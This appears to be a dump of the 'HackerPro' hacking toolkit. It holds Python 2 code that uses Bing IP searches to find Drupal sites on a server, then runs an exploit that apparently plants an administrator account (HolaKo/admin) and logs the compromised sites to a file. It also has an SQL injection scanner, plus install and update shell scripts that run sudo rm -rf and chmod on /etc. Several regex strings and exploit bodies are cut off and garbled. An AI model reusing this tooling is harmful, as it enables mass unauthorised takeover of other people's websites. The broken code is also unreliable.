IP : ')\n page = 1\n while page <= 50:\n\n url = \"http://www.bing.com/search?q=ip%3A\" + ip + \"&go=Valider&qs=n&form=QBRE&pq=ip%3A\" + \\\n ip + \"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first=\" + \\\n str(page)\n req = urllib2.Request(url)\n opreq = urllib2.urlopen(req).read()\n findurl = re.findall(\n '

\" + site\n\n print \"user:HolaKo\\npass:admin\"\n a = open('up.txt', 'a')\n a.write(site + '\\n')\n a.write(\"user:\" + user + \"\\npass:\" + pwd + \"\\n\")\n else:\n print \"[-] Expl Not Found :( \"\n\n except Exception as ex:\n print ex\n sys.exit(0)\n\n # Drupal Server ExtraCtor\n\n\ndef getdrupal():\n ip = raw_input('Enter The Ip : ')\n page = 1\n sites = list()\n while page <= 50:\n\n url = \"http://www.bing.com/search?q=ip%3A\" + ip + \\\n \"+node&go=Valider&qs=ds&form=QBRE&first=\" + str(page)\n req = urllib2.Request(url)\n opreq = urllib2.urlopen(req).read()\n findurl = re.findall(\n '

\" + url\n print \"[-]username:HolaKo\\n[-]password:admin\"\n save = open('drupal.txt', 'a')\n save.write(\n url + \"\\n\" + \"[-]username:HolaKo\\n[-]password:admin\\n\")\n\n else:\n print i + \"=> exploit not found \"\n except Exception as ex:\n print ex\n\n\ndef maine():\n\n print minu\n choose = raw_input(\"choose a number : \")\n while True:\n\n if choose == \"1\":\n drupal()\n if choose == \"2\":\n getdrupal()\n if choose == \"3\":\n drupallist()\n if choose == \"4\":\n about()\n if choose == \"99\":\n menu()\n con = raw_input('Continue [Y/n] -> ')\n if con[0].upper() == 'N':\n exit()\n if con[0].upper() == 'Y':\n maine()\n\n\ndef unique(seq):\n seen = set()\n return [seen.add(x) or x for x in seq if x not in seen]\n\n\ndef bing_all_grabber(s):\n lista = []\n page = 1\n while page <= 101:\n try:\n bing = \"http://www.bing.com/search?q=ip%3A\" + \\\n s + \"+&count=50&first=\" + str(page)\n openbing = urllib2.urlopen(bing)\n readbing = openbing.read()\n findwebs = re.findall('

\" + sqli)\n\n\ndef sqlscan():\n ip = raw_input('Enter IP -> ')\n grabsqli(ip)\n\n\ndef unique(seq):\n seen = set()\n return [seen.add(x) or x for x in seq if x not in seen]\n\n\ndef bing_all_grabber(s):\n lista = []\n page = 1\n while page <= 101:\n try:\n bing = \"http://www.bing.com/search?q=ip%3A\" + \\\n s + \"+&count=50&first=\" + str(page)\n openbing = urllib2.urlopen(bing)\n readbing = openbing.read()\n findwebs = re.findall('

] Press ENTER to Install HackerPro, CTRL+C to Abort.${NC}\"\nread INPUT\necho \"\"\n\nif [ \"$PREFIX\" = \"/data/data/com.termux/files/usr\" ]; then\n INSTALL_DIR=\"$PREFIX/usr/share/doc/hackerpro\"\n BIN_DIR=\"$PREFIX/usr/bin/\"\n pkg install -y git python2\nelse\n INSTALL_DIR=\"/usr/share/doc/hackerpro\"\n BIN_DIR=\"/usr/bin/\"\nfi\n\necho \"[✔] Checking directories...\";\nif [ -d \"$INSTALL_DIR\" ]; then\n echo \"[!] A Directory hackerpro Was Found.. Do You Want To Replace It ? [y/n]:\" ;\n read mama\n if [ \"$mama\" = \"y\" ]; then\n rm -R \"$INSTALL_DIR\"\n else\n exit\n fi\nfi\n\necho \"[✔] Installing ...\";\necho \"\";\ngit clone https://github.com/technicaldada/hackerpro.git \"$INSTALL_DIR\";\necho \"#!/bin/bash\npython $INSTALL_DIR/hackerpro.py\" '${1+\"$@\"}' > hackerpro;\nchmod +x hackerpro;\nsudo cp hackerpro /usr/bin/;\nrm hackerpro;\n\n\nif [ -d \"$INSTALL_DIR\" ] ;\nthen\n echo \"\";\n echo \"[✔] Successfuly Installed !!! [✔]\";\n echo \"\";\n echo \"[✔]========================================================================[✔]\";\n echo \"[✔] ✔✔✔ All Is Done!! you can execute tool by typing hackerpro !! ✔✔✔ [✔]\";\n echo \"[✔]========================================================================[✔]\";\n echo \"\";\nelse\n echo \"[✘] Installation Failed !!! [✘]\";\n exit\nfi" }, { "path": "update.sh", "content": "#\n# _ _ _ _____ \n# | | | | | | | __ \\ \n# | |__| | __ _ ___| | _____ _ __ | |__) | __ ___ \n# | __ |/ _` |/ __| |/ / _ \\ '__| | ___/ '__/ _ \\ \n# | | | | (_| | (__| < __/ | | | | | | (_) |\n# |_| |_|\\__,_|\\___|_|\\_\\___|_| |_| |_| \\___/ \n# Hacking Tools by-Technical Dada\n\nclear\n\nsudo chmod +x /etc/\n\nclear\n\nsudo chmod +x /usr/share/doc\n\nclear\n\nsudo rm -rf /usr/share/doc/hackerpro/\n\nclear\n\ncd /etc/\n\nclear\n\nsudo rm -rf /etc/technicaldada\n\nclear\n\nmkdir technicaldada\n\nclear\n\ncd technicaldada\n\nclear\n\ngit clone https://github.com/technicaldada/hackerpro.git\n\nclear\n\ncd hackerpro\n\nclear\n\nsudo chmod +x install.sh\n\nclear\n\n./install.sh\n\nclear\n" } ]